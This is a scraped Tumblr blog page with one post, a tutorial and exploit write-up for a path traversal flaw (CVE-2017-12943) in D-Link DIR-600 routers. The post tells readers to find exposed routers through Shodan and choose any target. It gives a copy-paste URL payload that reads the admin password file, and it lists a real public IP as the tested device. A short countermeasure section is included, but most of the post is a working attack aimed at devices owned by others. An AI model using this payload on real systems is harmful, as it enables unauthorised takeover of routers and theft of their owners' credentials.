jithindkurup
jithindkurup
Jithin D Kurup
1 post
  Information Security Consultant  
Don't wanna be here? Send us removal request.
Statistics
We looked inside some of the posts by jithindkurup and here's what we found interesting.
Average Info
Notes Per Post
0
Likes Per Post
0
Reblog Per Post
0
Reply Per Post
0
Number of Posts By Type
Text
1
Last Seen Tumblr Blogs
stevenqiu6727-blog
無標題
924 posts
lxngbottom
neville longbottom's big titty goth gf
225 posts
linkotemius
linkotemius
40 posts
raa-kun
.
32 posts
endlesslypushing
Untitled
57 posts
Fun Fact
Tumblr was the first site to host the blog for President Barack Obama in 2011.
jithindkurup · 8 years ago
Text
D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
Hello All,
In this tutorial i will explain How to get Username & Password of D-link router 600 - Directory Traversal Attack
Type: Webapps
Platform: Hardware
Choose any vulnerable (2.01,B1) router, browse www.shodan.io to explore all the Online devices (Register and login an Shodan account in order to unlock the advanced search features)
Search for D-Link DIR-600 router
Choose any router you want  and proceed to the login page
The hack is so simple, it requires no additional tools other your browser and quick copy-n-paste. Attacker is only required to do enter the following payload to get the user's creds : model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
eg: http://targetIP:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
if you set the traget device then you’re good to go.
Now you will see the login credential shown in plain text. Next, you may use the Login ID and Password to access the router.
if you need to exploit online, the target router must enable remote access. The password file must listed/located in the correct path which is /var/etc/httpasswd
Fix & Countermesure:
Turn off the router remote access feature if you are not using. Upgrade your router firmware.
For More Video POC & Exploit DB write up is below :)
# Exploit Title: D-Link DIR-600  - Authentication Bypass (Absolute Path Traversal Attack) # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 # Date: 29-08-2017 # Exploit Author: Jithin D Kurup # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 # Vendor : www.dlink.com # Version: Hardware version: B1 # Firmware version: 2.01 # Tested on:All Platforms
1) Description
After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL.
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.
Its More Dangerous when your Router has a public IP with remote login enabled.
IN MY CASE, Tested Router IP : http://190.164.170.249
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
2) Proof of Concept
Step 1: Go to Router Login Page : http://190.164.170.249:8080
Step 2: Add the payload to URL.
Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
Bingooo You got admin Access on router. Now you can download/upload settings , Change settings etc.
################################## Credits goes to: tytusromekiatomek
#dlink#600#authentication bypass#AbsolutePathTraversal#attack#CVE-2017-12943#Exploitdb
0 notes